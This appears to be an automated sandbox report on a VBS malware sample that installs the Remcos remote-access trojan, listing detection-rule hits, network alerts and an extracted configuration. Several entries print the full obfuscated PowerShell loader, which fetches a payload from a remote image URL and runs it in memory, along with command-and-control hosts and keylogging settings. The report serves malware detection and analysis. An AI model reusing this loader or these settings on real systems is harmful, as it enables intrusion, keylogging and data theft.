LkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl
                        Sigma detected: Script Initiated Connection to Non-Local Network
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 7924, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , ProcessId: 4996, ProcessName: wscript.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentProcessId: 7924, ParentProcessName: aspnet_compiler.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\paqxrhksjzifkagvqwpv.vbs" , ProcessId: 4996, ProcessName: wscript.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", ProcessId: 3556, ProcessName: wscript.exe
                        Sigma detected: AspNetCompiler Execution
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, ParentImage: C:\Windows\
                        Sigma detected: Script Initiated Connection
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.63.94.214, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3556, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713
                        Sigma detected: Suspicious Copy From or To System Directory
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3704, ParentProcessNam
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BBVA S.A..vbs", ProcessId: 3556, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRl

                        Stealing of Sensitive Information

                        barindex
                        Sigma detected: Remcos
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7924, TargetFilename: C:\ProgramData\remcos\logs.dat

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:38.013728+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.649784TCP
                        2024-12-17T14:31:15.461826+010020204251Exploit Kit Activity Detected104.21.84.67443192.168.2.649880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:38.013728+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.649784TCP
                        2024-12-17T14:31:15.461826+010020204241Exploit Kit Activity Detected104.21.84.67443192.168.2.649880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:40.870317+010020365941Malware Command and Control Activity Detected192.168.2.64979545.80.158.3023101TCP
                        2024-12-17T14:30:54.120307+010020365941Malware Command and Control Activity Detected192.168.2.64982945.80.158.3023101TCP
                        2024-12-17T14:30:54.261015+010020365941Malware Command and Control Activity Detected192.168.2.64983045.80.158.3023101TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:43.373018+010028033043Unknown Traffic192.168.2.649803178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:39.010116+010028582951A Network Trojan was detected104.21.84.67443192.168.2.649784TCP
                        2024-12-17T14:31:16.431606+010028582951A Network Trojan was detected104.21.84.67443192.168.2.649880TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-17T14:30:37.607592+010028410751Malware Command and Control Activity Detected192.168.2.649784104.21.84.67443TCP
                        2024-12-17T14:31:15.065246+010028410751Malware Command and Control Activity Detected192.168.2.649880104.21.84.67443TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus detection for URL or domain
                        Source: firewarzone.ydns.euAvira URL Cloud: Label: malware
                        Source: sun.drillmmcsnk.euAvira URL Cloud: Label: malware
                        Source: rem.pushswroller.euAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "sun.drillmmcsnk.eu:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghghyrtssxr-7RL1P2", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,21_2_0043293A
                        Source: aspnet_compiler.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        barindex
                        Yara detected UAC Bypass using CMSTP
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Contains functionality to bypass UAC (CMSTPLUA)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_00406764 _wcslen,CoGetObject,21_2_00406764
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49713 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49784 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 45.63.94.214:443 -> 192.168.2.6:49790 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49880 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,21_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 21_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,21_2_0041B42F
